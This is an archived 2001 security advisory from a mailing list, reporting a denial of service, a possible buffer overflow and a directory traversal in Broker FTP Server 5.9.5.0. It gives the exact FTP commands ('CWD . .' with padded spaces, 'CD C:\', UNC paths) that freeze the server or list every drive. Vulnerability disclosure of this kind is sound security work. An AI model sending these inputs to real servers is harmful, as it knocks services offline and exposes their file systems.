Broker FTP Server 5.9.5.0 Buffer Overflow / DoS / Directory Traversal

From: ByteRage (byterageat_private)
Date: Sun Jun 10 2001 - 01:38:04 PDT

Next message: Marc Maiffret: "IDS's, host: headers, and .printer ISAPI overflow as an example"

Previous message: Dante Mercurio: "WatchGuard SMTP Proxy issue"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Broker FTP Server 5.9.5.0 Buffer Overflow / DoS /
Directory Traversal

TESTED ON

Broker FTP Server 5.9.5.0 on Windows 98, likely to
work on NT / 2k 

DESCRIPTION

1) Buffer Overflow / DoS

The DoS, which completely freezes the victim machine,
can be triggered by repeatedly sending
the following command (after logging in) :

CWD . .
(CD ". ." with an FTP client)

or even better by adding some more spaces between the
dots :
CWD .                                                
.

the server seems to regard these dirs as valid and
appends them to the current path, causing a DoS after
a certain bound has been reached... (I think you have
to repeat the last one about 30 times or so...)

I have attached the script brokerdos.pl which
automates this.

Maybe I'm getting delusional, but I have been able
once to make Broker FTP Server crash this way setting
the EIP to something like "  .\" (and my SoftIce
popped up) so this buffer overflow might be
exploitable... I have not been able to reproduce this
situation afterwards though.

Also, the file at C:\Program Files\TransSoft
Ltd\Broker 5\Data\Errors.log gave me access violations
at offsets that were definitely taken from the input
string. (like 20202020, 2020202E etc...)

2) Directory Traversal

You can map out the contents of every drive available
to the system in the following manner...
(You don't seem to be able to upload / download files
though)

To go out of the home directory type the following in
your FTP client :

CD C: or CD C:\

(you can also go to the A: drive with CD A: (or
CD-roms & network drives))
Now you can list out the contents of the drive with
the FTP client :

LS 

And dive into subdirs with something like :

CD C:\WINDOWS\

etc...
Although you can map every drive, you don't seem to be
able to send/recieve files. It is also possible to
traverse the homedirectory using UNC pathnames
(starting with \\) which might be used to remotely
access local shares.

VENDOR STATUS

I have sent this advisory to <supportat_private>

You can get the updated advisory at
http://elf.box.sk/byterage/adv7.htm

======================================================
[ByteRage] <byterageat_private> [www.byterage.cjb.net]
======================================================

__________________________________________________
Do You Yahoo!?
Get personalized email addresses from Yahoo! Mail - only $35 
a year!  http://personal.mail.yahoo.com/

application/x-perl attachment: brokerdos.pl

Next message: Marc Maiffret: "IDS's, host: headers, and .printer ISAPI overflow as an example"
Previous message: Dante Mercurio: "WatchGuard SMTP Proxy issue"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Jun 10 2001 - 13:20:51 PDT